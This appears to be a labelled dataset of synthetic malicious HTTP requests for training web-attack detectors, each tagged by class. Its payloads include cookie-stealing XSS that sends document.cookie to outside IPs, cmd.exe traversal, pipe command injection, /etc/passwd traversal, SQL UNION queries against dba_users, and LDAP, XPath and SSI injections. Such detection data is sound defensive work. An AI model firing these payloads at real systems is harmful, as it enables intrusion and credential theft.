Cookie2: $Version="1"
Date: Thu, 04 May 06 17:46:05 UTC
ETag: W/"utOApzZbAhT5WSy.P0"
Expect: 100-continue
From: 8se9efj@lkeeudtih.com
If-Modified-Since: Tue, 28 Dec 04 16:44:26 UTC
If-Unmodified-Since: Wed, 28 Apr 04 01:03:42 UTC
If-Match: *
If-None-Match: "fVGh6Hz4BFoC-uY8Hu"
If-Range: Fri, 04 Jul 08 15:35:53 GMT
Max-Forwards: 7
MIME-Version: 9.1
Pragma: autu=r
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: NTLM cmw1YXRhNmVhdHRFdG5taGRwdDJuaGhud3VGc2VtZWpjZXY3aWlz
Range: -790
Referer: /cq0yep9e/ueAe7see.rar
TE: trailers
Trailer: Range
User-Agent: socisafrDr/5.3
UA-CPU: MIPS
UA-Disp: 2330,130,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8473x700
Via: HTTP/5.1 www.2ttcijur.gif:8, 4.5 84.139.150.214:15207
Transfer-Encoding: 2gtilt
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

3hohg0laras2i=651146&yoamqnyeyl=00952097&ttjoltntee=2971&nco=: objectasfniEcrdeinnd&eNeljeo7at=54758655&1fYxKAS=suttrmecSerlo&0agn6opiuanllo=75704&dlFjGhtpassJ=5443&no7rlhdygkotgtc=97&4rxydlcou= hn&formXKZDylnetcatr-O=jwNto&hHhasitjmeeEOn=ilnsaRrTSml1&st9aowettenane=<style type   =   "     text/javascript">[window.open('http://163.36.125.196/le.msf'+document.cookie);]</style>&ay0ihlhoical=p7iy&g5p6bmss=3

End - Id: 46911
Start - Id: 44034
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 72.213.184.28
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.2, gzip;q=0.4, identity, gzip
Accept-Language: *
Cache-Control: min-fresh=1
Client-ip: 78.141.142.69
Cookie: 2mvr5oi=iRHnfnec50;sjQerlrnv=oMe
Cookie2: $Version="0"
Date: Mon, 30 Jan 06 06:34:57 CET
ETag: "WbM8En5tZV7LU.d"
Expect: e3et=angools;afxg=l15eYh
From: fasutm@u0PGri.cz
If-Modified-Since: Tue, 12 Feb 08 10:52:51 UTC
If-Unmodified-Since: Sun, 08 Feb 09 23:05:07 CET
If-Match: *
If-None-Match: "hcu2HQJwzIw8snN"
If-Range: Sun, 09 Aug 09 11:15:26 GMT
Max-Forwards: 15
MIME-Version: 0.2
Pragma: o='0rOus'
Proxy-Authorization: Digest realm
Authorization: Digest response="74b14Bd658AABAFabDFa0d4eF9c24bA4"
Range: 67-764741,470518-20,3-202913
Referer: /enlrex/irdt/eckah/aljuto.jsp
TE: gzip,trailers,deflate;q=0.5
Trailer: Accept
User-Agent: yGJDZxS_ http://www.dyTa.cz
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4697x9146
Via: HTTP/6.9 14.89.228.227:412, hta/0.0 www.sere.shtml:0694
Transfer-Encoding: nraOo
Upgrade: 4nbliA/2.5, eous/5.8, fatd0y/7.3, htsLm/7.0, ejSl/2.7
Warning: 433 www.lisatk.htm "tl3Nr" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44034
Start - Id: 38165
class: LdapInjection
GET /ix5tR/hZBY2DZt51..pl?iee5tTiuteaf46=5021193&ieieuDeh=oha0etd9xoeo&fob5w=arce%29%28+%7C++%28hss1%3D*%29&aojetiAt=stdinn&lXOWwgetXdde=voSirareaGmaild&nnsd=d+eehwherei&rcegn1rbkhsnMng=%28eixnhayeoSNro%5Cm HTTP/1.1
Host: www.HbDdvRsi1b.biz
Connection: owmn2s
Accept: video/quicktime, image/jpeg, application/*
Accept-Charset: x-mac-ce;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 122.205.56.130
Cookie: 5sisi=ehb0;anxntirNuoh=3961008128;5-ycosaccess_logG1T4=rq r~;AcLztn1aghhgpde=mnheanwYnehYutw;hhdy6te=sz0@J3FXlju3;Ttn=rmornrmo
Cookie2: $Version="672"
Date: Wed, 07 May 08 03:24:17 UTC
ETag: W/"I4g._rkzJPtJSclIRTr"
Expect: itgdtcl=icezz
From: b63ter3o@6adqse.net
If-Modified-Since: Fri, 09 Nov 07 06:09:34 GMT
If-Unmodified-Since: Tue, 25 Nov 08 10:44:52 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 26 Nov 09 03:11:37 UTC
Max-Forwards: 7289
MIME-Version: 5.5
Pragma: nst8ias=2cvi
Proxy-Authorization: vanc 8esln=eenorc9
Authorization: Digest username="ivnI"
Range: -0244,6315-
Referer: http://0srP9upe.org/WeDtloc7.php
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.6 (Machintosh; U; Mac OS X 4.7; nh-tt; rv:2.1.7) Gecko/79551517
UA-CPU: PowerPC
UA-Disp: 745,764,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 550x1014
Via: 0.5 www.ofmk6rga.jpg
Transfer-Encoding: sctr
Upgrade: nume/0.6, Uma/7.3
Warning: 607 www.RgHm.tiff "solih9ny" 
X-Forwarded-For: 155.87.202.213
X-Serial-Number: 276586158043
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38165
Start - Id: 46028
class: PathTransversal
GET /vWs/rsnoatsnedueecilneU/o6aidrlp3h/7b.htm? HTTP/1.0
Host: 187.204.208.159
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: \.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Cache-Control: 4tqeesM='s99n3cd'
Client-ip: 63.83.38.140
Cookie: Hq6@F@r=iframetorm;n8cC8ueeli=Tfelseb;5yA6=eVvu;eaerheAsmIyiere=IdwimgmsiHynem;yepnseic2aTshl=jmjcoosNilagNR4pac;aps=stltey3nsiiguna
Cookie2: $Version="499"
Date: Tue, 11 Oct 05 08:40:17 UTC
ETag: "EZn5TZzGo56qM5vSf"
From: eircind@aorae.fr
If-Modified-Since: Wed, 04 Mar 09 01:41:33 GMT
If-Unmodified-Since: Sun, 31 Dec 06 24:28:32 CET
If-Match: "zvPzJTTfB@SBYNegGy"
If-None-Match: *
If-Range: Fri, 19 Jun 09 06:32:08 CET
Max-Forwards: 0
Pragma: no-cache
Authorization: Basic ZWU1YWg6bmVnaWhl
Referer: http://Thod.fr/eHNae3mo/8uPyuire.php4
TE: chunked;q=0.7,deflate
Trailer: Authorization
User-Agent: Mozilla/4.4 (Machintosh; U; PPC 6.6; hq-ht; rv:9.9.5) Gecko/97829835
UA-CPU: Sparc
UA-OS: Windows NT
UA-Color: color16
Via: 7.1 www.anmleds.js:45
Transfer-Encoding: deflate
Upgrade: SnetBt/9.0, lhEp/0.1
Warning: 793 www.tyrd.shtml "8ufoatiglFcqs3etd" "Mon, 28 Jan 08 03:54:45 UTC"
X-Forwarded-For: 20.101.217.179
----: ----------------

null

End - Id: 46028
Start - Id: 35891
class: XPathInjection
POST /0VRJ/hjb9UYrJdivzcv9/TewTeems7oa/w8selhhnevedeaern.cfm? HTTP/1.1
Content-Length: 84
Content-Language: 3hs,nth,eeama
Content-Encoding: gzip
Content-MD5: dGNzc0tlNmVwYWVhaXdhbA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Oct 05 13:24:16 CET
Last-Modified: Mon, 30 Apr 07 14:28:55 UTC
Host: 166.157.104.111
Connection: igfctols
Accept: */*
Accept-Charset: iso-2022-kr;q=0.5
Accept-Encoding: ngope'   or  6 < count(path/child::*) or   'etrhS5es' =    '
Accept-Language: te1r-mdneem;q=0.5
Cache-Control: rdyo=s75cmhi7
Date: Sun, 27 May 07 03:33:46 UTC
If-Modified-Since: Fri, 18 Jul 08 09:29:54 GMT
If-Unmodified-Since: Sat, 07 Aug 04 06:00:01 GMT
If-Match: "Ju9uXMl0mohFcAb"
If-None-Match: "kIk4JobrNr@6vJujLCd5"
If-Range: *
Pragma: no-cache
Authorization: Basic aG9zbnRxOmhlamFhZW4=
Range: -23690,93-568748,-273092
Referer: /alla6ea/heAttrsa/pxxa80nS.asmx
User-Agent: fCb7bfjy http://www.l4tix.be
UA-CPU: PowerPC
Transfer-Encoding: aee9h; esoTWees=punSs3o
Upgrade: isre/2.5, fTav/7.2, rrvnwi/3.7, gsd/4.7
Warning: 657 191.154.129.185 "iulzyysenebtiTitMaMp" "Thu, 11 Jan 07 02:56:56 UTC"
X-Serial-Number: 503350081562336
----: -------------

M7CmailM9Y= cEdtyieqvarli&TfE5s=6&r4d0goattrrlR=w4lw9@AP&qohug4St8oe=iseng?smxie

End - Id: 35891
Start - Id: 37359
class: LdapInjection
GET /e@-Ds.Gafe9/u6j..Vlp6neFaiwVUeck.html?-tmplupdateCQNCSjnP=xylhtOwu&pmsnihyna=89&I6snosehcte=6214111&I6r4QToJbpy=3denea&sebssln=zlikesstos&tup=7213559 HTTP/1.0
Host: www.o0asd7ip8d.biz:6227
Connection: ru0w0r
Accept: text/*;q=0.7
Accept-Charset: *
Accept-Encoding: compress, gzip, compress, compress;q=0.2, deflate
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 212.91.230.42
Cookie: hhoqozkstg8xsh=02;irlni=rcpxeo0twhe7cr
Cookie2: $Version="9"
Date: Wed, 10 Jan 07 08:04:16 CET
ETag: W/"1sErXqkCyucdByw"
Expect: 100-continue
From: 6eoetp@selEd.fr
If-Modified-Since: Sun, 13 Jul 08 07:37:20 CET
If-Unmodified-Since: Sat, 10 Dec 05 10:31:27 UTC
If-Match: "Cn78QQXcAagO.Df"
If-None-Match: "bkyjff2CWaAGk.uYfWxC"
If-Range: Mon, 15 Mar 04 13:17:35 CET
Max-Forwards: 85
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic b3NuZXI6Z0FvdWU=
Authorization: Digest username="iteidhe"
Range: 257723-74,-66
Referer: http://ptotssli.gov/tdraiar.jsp
TE: trailers,trailers,gzip;q=0.8
Trailer: Accept-Language
User-Agent: )    ( | (    cn=*o  'brien*)(mail =*o 'brien*  ) 
UA-CPU: x86
UA-Disp: 794,0889,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5121x090
Via: 9.0 www.0pgsq9vw.htm:072, FTP/7.9 47.248.163.219:382
Transfer-Encoding: compress
Upgrade: aite/2.5
Warning: 063 211.26.149.166 "smbe8tiNrn" "Sat, 11 Mar 06 17:33:18 CET"
X-Forwarded-For: 231.143.90.28
X-Serial-Number: 30089699
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 37359
Start - Id: 38742
class: LdapInjection
GET /h1sPfFpbgpKK5wrd/1@O/5ReYry/ets/HInjDS/rk8qwv6uF_3/rZKUGlGBcmUA/ngto.js?nrpncqc=8774502240&arloamaop=j7PZDYOVJ5W&eeHrmOpaarrlF=t-FdUehP5&ZgYASMechoadminQ=72065&ke1igosi=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&fA7hDsplLct=iiframeautoexecetestyleT19rcwvbscript%5Deo1u%2B&fveeqcbx=ahie2brdar5e&2n=492267691 HTTP/1.0
Host: 209.148.22.82
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: rfaa7t-nab;q=0.9, fA-r;q=0.8
Cache-Control: min-fresh=557
Client-ip: 62.92.248.134
Cookie: iOs5G9=62936763;In1ps=2
Cookie2: $Version="7"
Date: Mon, 10 Mar 08 01:31:45 GMT
ETag: W/"e8ISoAtba4-kVYA"
Expect: Eirzruo
From: Dddcd@u4uew8d4.be
If-Modified-Since: Mon, 20 Sep 04 24:47:52 UTC
If-Unmodified-Since: Sat, 29 Nov 08 18:08:10 CET
If-Match: "C_MnkL8kgjS8VHcki"
If-None-Match: "URYDUEK7APNr5saix"
If-Range: "RIOzBzns1lbsZUb"
Max-Forwards: 8609
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic eVRzbllhY2U6aXN0bw==
Authorization: NTLM c3VyaWFnYnZpZm9lYXRsVGxyZWtsZXJoeWNob2hscXBpaDduaWll
Range: 6-630560,55-36780
Referer: /sreiHS.zip
TE: trailers,deflate,trailers
Trailer: Authorization
User-Agent: oHpJB5_qsr http://www.te2tt.cz
UA-CPU: MIPS
UA-Disp: 495,5054,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 708x0432
Via: FTP/9.8 www.cntw.js
Transfer-Encoding: diAUz; vhlate=t5Eee
Upgrade: dEii/5.0, tdxit/7.6, ieed/6.6, lZat/6.5, ogl/2.1
Warning: 815 www.sni22ed.shtml "iihdw6iguibnuR" 
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 91445747246733
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38742
Start - Id: 49187
class: XPathInjection
GET /qlstt1tobiAeyct/t2WqIFBfriz@gxaJn/hNyOD/dwr1kuHze8teeher/_a9netcathmcopy1QFIV/enusbidNzeSusl/rbg-kqK7T.php4?wtoEsteeeetv=trcataemu&8etraaauagXsi=0&wZ1mocha6kOS5L=602+++++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+8387%3D HTTP/1.0
Host: 100.52.70.73
Connection: weinU
Accept: */*
Accept-Charset: us-ascii;q=0.9, cp-936
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 69.65.142.204
Cookie: ri=tmahucdphgad1d;Ch4=3;mzzro=hwun\ewidv;luede=sG2sbs;3s7msna0e=div9
Cookie2: $Version="8"
Date: Wed, 30 May 07 18:16:16 CET
ETag: "vrp1kGmnEHoBox1Rdwu"
Expect: oSmxlt
From: ir0psea@aO25fruan.gov
If-Modified-Since: Mon, 31 Aug 09 03:45:58 GMT
If-Unmodified-Since: Wed, 09 Apr 08 13:47:37 CET
If-Match: "1wNGJ7E0YlxE6afrRG"
If-None-Match: *
If-Range: Sat, 15 Nov 08 06:20:50 GMT
Max-Forwards: 23
MIME-Version: 7.4
Pragma: odoa=ho
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: Digest uri=/amizr/ils8g/nze9.png
Range: 87-,-69535,7135-70843
Referer: /deol/j0e8/yeenheXn.mspx
TE: trailers,gzip,gzip;q=0.6
Trailer: Connection
User-Agent: dN1.04 http://www.eapaidin.uk
UA-CPU: x86
UA-Disp: 809,4297,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 400x881
Via: FTP/0.0 www.dseSe.shtml, 6.9 18.115.225.102
Transfer-Encoding: compress
Upgrade: 1iqlLr/6.5, tlii/7.8, eetsh6/1.2, xr2f/8.0, jok/4.0
Warning: 186 110.57.33.198 "wcete" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49187
Start - Id: 41326
class: SqlInjection
GET /sNrzidnUllsaceoa/rVZlkd8Pqq9Mvg/i4Hbf@Vefou_Lv2UKIh/e4h/ocjnz9lxsUzetc7ojeo6/includeH_0DZ6REtrKyG/masppoJDdrtleytp/t@kHgj/qW6dIPbpn.W_/tkne.php3?eHe37secra0irc=onlnh4a7tNiajosOa&rn3mrhIt=mnyLienhD5f&stdin-.connecteoWzJ=e1ohfh%3Cnt&HPPINPkshutdowncb=365&nitK1wiokvdpiar=459242&tl=jm+ddsr&Nrasi=55518440&ftePefeunMu2ul=5346887&bwhereOwindow.openn=an3&6iw3ouriadg=w2oE.vI&gofhnuSso=plje+Eae&iIth=26995911 HTTP/1.1
Host: www.zOTNa.biz
Connection: eteq
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.0, compress, compress
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 135.135.250.141
Cookie: qvM1nph-=moh1'     UNION  /**/     SELECT lD     FROM dba_users   WHERE nry8i     like  '%25
Cookie2: $Version="74"
Date: Thu, 22 Apr 04 21:20:58 GMT
ETag: "_UfSHDRMCQ2e7qbSD45"
Expect: 100-continue
If-Modified-Since: Mon, 25 Dec 06 09:33:23 GMT
If-Unmodified-Since: Thu, 29 Jul 04 12:00:18 UTC
If-Match: *
If-None-Match: "B-NaGTEI77gurnEf"
If-Range: Sun, 28 Jan 07 03:46:10 UTC
Max-Forwards: 1
MIME-Version: 0.0
Pragma: a5=ciee
Proxy-Authorization: aOscx rtu8=4sni
Authorization: eiOlse meSia=ebceths
Range: 4-
Referer: /ulaemtdr.js
TE: trailers,trailers,deflate
Trailer: Range
User-Agent: yisnrcs1
UA-Disp: 343,7284,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 654x944
Via: 0.5 www.VrN7d.jpg, FTP/6.1 www.l9nen.gif, HTTP/3.3 163.237.173.118
Transfer-Encoding: ntta; 1a5xntfe=afoa
Upgrade: wNr3h/2.0, bss/8.7, iho/9.9
Warning: 731 www.cyyerh.gif:8 "drlplsjnceh" "Fri, 01 Dec 06 07:00:44 CET"
X-Forwarded-For: 94.64.57.114
X-Serial-Number: 553684873
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41326
Start - Id: 39717
class: SSI
GET /ti4tc/etusioonsoahao4h49T.exe?rzes=5198&dSt0=4118&spnlanmons=nQdBb&htio9dsAi=3tx&askySr=32&woAldc=gv&gexnra=Ammiitumt&ncmfagwmnI=121626&sao=%3C%21--++%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++--%3E HTTP/1.1
Host: 49.81.169.194
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: tY4Oio-synu11;q=0.0, Hwrsa-2qgeO, ajeeps-odm;q=0.1, 3se30rn-t;q=0.8
Cache-Control: no-store
Client-ip: 215.74.168.109
Cookie: jInnirdnirfe3g=m'divu;nudaambmnDa=eec;gsrxhw=11;domAcgu=pVBP
Cookie2: $Version="372"
Date: Sun, 18 Nov 07 10:29:57 UTC
ETag: "S3drG_PYWSBZhlFGgd0W"
Expect: 100-continue
From: iltkt32@r7Muj.it
If-Modified-Since: Wed, 06 Jul 05 13:43:44 UTC
If-Unmodified-Since: Thu, 19 Feb 04 12:21:15 UTC
If-Match: "hjtsd67YVFRVj09tjT8"
If-None-Match: "sxPKoV3rJ.qan7-7SX45"
If-Range: "LMELrdm0q4y3CH.e"
Max-Forwards: 2811
MIME-Version: 4.8
Pragma: 1x=exora
Proxy-Authorization: Digest nc=CBADdAaC
Authorization: NTLM aHNsZWFuZW5vZ2FnY2hpZWNmNWhvSm1zZWZyc3NldGdzcGdwb2V5ZW85Z0E=
Range: 61-,98874-5,222224-
Referer: http://dva5.ch/sennxrl/F1z4/ua6mM.mspx
TE: trailers
Trailer: Host
User-Agent: Mozilla/2.3 (X11; U; Open BSD i386 9.1; t9-nu; rv:4.1.6) Gecko/02749815
UA-CPU: x86
UA-Disp: 3264,053,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 066x3039
Via: 0.1 211.223.169.217
Transfer-Encoding: eeay; e5zjrlea=rueea
Upgrade: eoe/8.5, rhosn/0.5, slnwao/7.8
Warning: 414 39.123.241.242 "diuAtlysh" "Sat, 05 May 07 01:06:17 GMT"
X-Forwarded-For: 227.157.179.153
X-Serial-Number: 9911764547155
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39717
Start - Id: 48622
class: XPathInjection
POST /e-SXH5lQzaGNA/hjCan.aspx? HTTP/1.1
Content-Length: 112
Content-Language: qheMkn,s5s
Content-Encoding: identity
Content-Location: http://kw5dcej.gov/eiOiEp/cnppxait/wojin/uDMae/akcts.rar
Content-MD5: dkNsdHR4ZW94aXJvZXo1aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Dec 08 03:31:03 UTC
Last-Modified: Sat, 24 Jun 06 21:05:09 UTC
Host: www.Pe2aI.org
Connection: close
Accept: audio/*, video/quicktime
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: Shsgc='nd6'
Client-ip: 92.5.125.205
Cookie: sso=alyZPpBUO;C.CAqdwTYq5=ujtm3eera;eteuso9ogaesls=y3ggtsd;yltqxT=gZ6a
Cookie2: $Version="281"
Date: Sun, 28 Mar 10 18:53:05 UTC
ETag: W/"nUus8CIhQ-6I@fzm7nrc"
Expect: eMrs8rmb
From: wsnewerh@atausf.it
If-Modified-Since: Sat, 06 Feb 10 10:54:15 CET
If-Unmodified-Since: Sat, 24 Nov 07 12:47:26 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Feb 07 20:08:08 GMT
Max-Forwards: 752
MIME-Version: 7.4
Pragma: mmosor='c'
Proxy-Authorization: Basic ZWVpVDpoZGVvc0Fz
Authorization: Digest nonce
Range: 939-64,563448-00397,65796-
Referer: /tO2lrt/itmtovo/breiAns.conf
TE: deflate;q=0.2
Trailer: Referer
User-Agent: nev7 (5opkw8pu0; eBSHEM; tY.GkWU4; rN8AHvJF)
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: l1u/7.1 www.eb11nnua.js
Transfer-Encoding: rsyo; istsEi=noIa
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 98968
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cmb6tg=63463&bse=ncr6' or     path/child::node()[position()=N]     or     'Nyer'='

End - Id: 48622
Start - Id: 47189
class: XSS
GET /ebsOteu/otahhelAfyvoD5a/ycrhsL/oI4x8.lzXM9sH8aE/l6soseeTopsbdkema.gif?os25Btrenwrqa=0158233&j5Hel=naaesrenh5g&hckutc=%3Ciframe+src++%3D+++%22vbscript%3A%5Bwindow.open%28%27http%3A%2F%2F69.211.103.1%2Fgechte.sh%27%2Bdocument.cookie%29%3B%5D++++++%22++++%3E&rqitoua7=olymiae&eSseptsudphtbTn=e%2BsoI6ehnak&ee=Edioe7&oiaToe=itC&EnfaNicz=ec+&age=t_acToTr&23A=andat&hedn=hF5RCR.Eww HTTP/1.1
Host: 85.123.232.193
Connection: keep-alive
Accept: video/*;q=0.9
Accept-Charset: windows-1251, gb2312
Accept-Encoding: compress, compress, compress;q=0.6, compress;q=0.0, deflate;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 193.55.166.33
Cookie: eNfromQ=TLAho
Cookie2: $Version="81"
Date: Sun, 17 Feb 08 17:54:39 CET
ETag: W/"bo.SFw@Le2qxDYl"
Expect: 100-continue
From: oeDi@asaha.net
If-Modified-Since: Fri, 01 Aug 08 15:08:49 GMT
If-Unmodified-Since: Fri, 16 Feb 07 05:17:21 UTC
If-Match: "4D@_eka8sw_eHRUP"
If-None-Match: *
If-Range: *
Max-Forwards: 94
MIME-Version: 2.6
Pragma: uva='di'
Proxy-Authorization: n0ntl bt2Ndpz=9yldlwu
Authorization: Digest response="B7e9cCEafc2ee981F7b29FDEC2eFF6Ee"
Range: 671-463
Referer: /tqns/NAOpttt/lubb/sT0n.php
TE: trailers,trailers,deflate;q=0.3
Trailer: Transfer-Encoding
User-Agent: wrs0mc1u (sFmiK0mi; eE2j_jIrY; sbt_7JZp; eNDEwF; aKiQDJ6Sj)
UA-CPU: 68000
UA-Disp: 934,693,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 739x565
Via: tw9f/9.3 6.85.199.44:3144
Transfer-Encoding: identity
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47189
Start - Id: 44947
class: PathTransversal
GET /eyOQA4SkwfpBaSEBFVcp/alltelnetKrq4NCy5fdS/nhncts6/d@k_az@Ijwz/fLdcLDIp5ppVdrsJtnpF/c0/d.ohqC171zY7_01de/sP.mdb?Si=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&ree9h=nr&koaiSA=ize8fw&mjtpenrsWttTnt=%2Boeevaliotig%28&eu=eo1w3pre+tl&3iroeeulO=openEselect%29&rtm=t4&ahahCnsi1toad=yjoeSeR&semib=senzatjuhEgiragt&zeattam8=nnPBT2&tehij2ieaeeirs=71275&Tipe=oSc&iwaubagsfhteh=qe4ojoliya HTTP/1.1
Host: www.rtljQk.fr
Connection: close
Accept: image/png;q=0.5
Accept-Charset: x-mac-japanese;q=0.7, cp-950
Accept-Encoding: *;q=0.7
Accept-Language: tDndct-aCtriw, nr5r-eltndUa, gkox-xlerrtbs, mpfsghaA-omnxfoi, eO-e3;q=0.2
Cache-Control: no-cache
Client-ip: 199.211.182.175
Cookie: ntmf19yfmeesHwr=fsKq;-BWiKQ0r9='t5igt;aeeoesl=:yg@oitrte;Eth5li=5
Cookie2: $Version="9"
Date: Sat, 30 May 09 24:53:29 GMT
ETag: W/"wJvKQt1.0rl.z_JGAdW3"
Expect: 100-continue
From: idto@ug5qpuenx6.org
If-Modified-Since: Tue, 20 Apr 04 21:12:06 CET
If-Unmodified-Since: Fri, 13 Apr 07 16:05:22 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest response="cFbf2F57cDDF4E7Ed19bE92BCEa0ec12"
Authorization: Digest response="837A67CfDCBE3eE4e2Af364Ae77DAa7D"
Range: 032407-30
Referer: http://www.usCstn.fr/crocYnt/ieeb6s/n0enh.msf
TE: trailers,chunked;q=0.5,trailers
Trailer: Referer
User-Agent: iaenrm2O/5.8.1
UA-CPU: StrongARM
UA-Disp: 8355,9239,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2762x370
Via: 5.4 www.Jtier.tiff, rRstat/1.6 www.hoasnks1.jpeg
Transfer-Encoding: gzip
Upgrade: sSAynh/2.0, tnEo/3.3, jo1wa/2.9
Warning: 619 65.227.235.2 "te2tns3h" "Fri, 05 Sep 08 07:18:21 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44947
Start - Id: 48343
class: XPathInjection
GET /euzi2rohntys6Uuk8iw6/z.SSAj/5ahral5VtexhhhsoHql/eecbssNorqtn/QuLlink8ZFNV/oasnttasobaebEs.php? HTTP/1.1
Host: 222.135.9.196
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.8, compress, compress
Accept-Language: 0ch-etloi, i-w5ooE
Cache-Control: min-fresh=4808
Client-ip: 212.64.47.126
Cookie: vyoNenetg=eunions'aw Bmr;zQX6m1t9.WstyleC=120
Cookie2: $Version="8"
Date: Sat, 25 Mar 06 01:02:25 CET
Expect: 100-continue
If-Modified-Since: Thu, 01 Nov 07 05:34:28 UTC
If-Unmodified-Since: Fri, 07 Jan 05 10:37:29 CET
If-Match: *
If-None-Match: *
If-Range: "wHQjsgnV9cYty2xH"
Max-Forwards: 02
Pragma: rEcRe='aee1n'
Proxy-Authorization: Digest realm
Authorization: heeCz soatyo=hT9sri
Range: 7571-231,462-
Referer: /1nmxEeds.wmn
TE: chunked;q=0.8,trailers,deflate
Trailer: Accept-Language
User-Agent: 8809     or     count(path/child::node()[position()=((i+j+k+l+1)]  |     path/child::*()[position()=(k+1)])=1    or 502=
UA-Pixels: 784x5970
Via: 2.5 www.tdioemb.png
Transfer-Encoding: compress
Upgrade: ihoq4/1.0, oHxar/7.4, sms/8.7, rraA/0.1, hst/1.8
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Serial-Number: 950594600737

null

End - Id: 48343
Start - Id: 43990
class: OsCommanding
GET /cgi-local/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: 88.254.146.165:15
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=80563
Client-ip: 60.172.21.158
Cookie: lictMeO=ns 
Cookie2: $Version="49"
Date: Tue, 04 Nov 08 05:32:54 CET
ETag: W/"KWt6cmpUGlB3N9ot-m-c"
Expect: 5titid9=sseu
From: 44fa@mshrPyo.gov
If-Modified-Since: Fri, 21 Dec 07 21:37:06 GMT
If-Unmodified-Since: Sun, 06 Jan 08 14:36:50 GMT
If-Match: "c-fLi71JGG3ITG0UI"
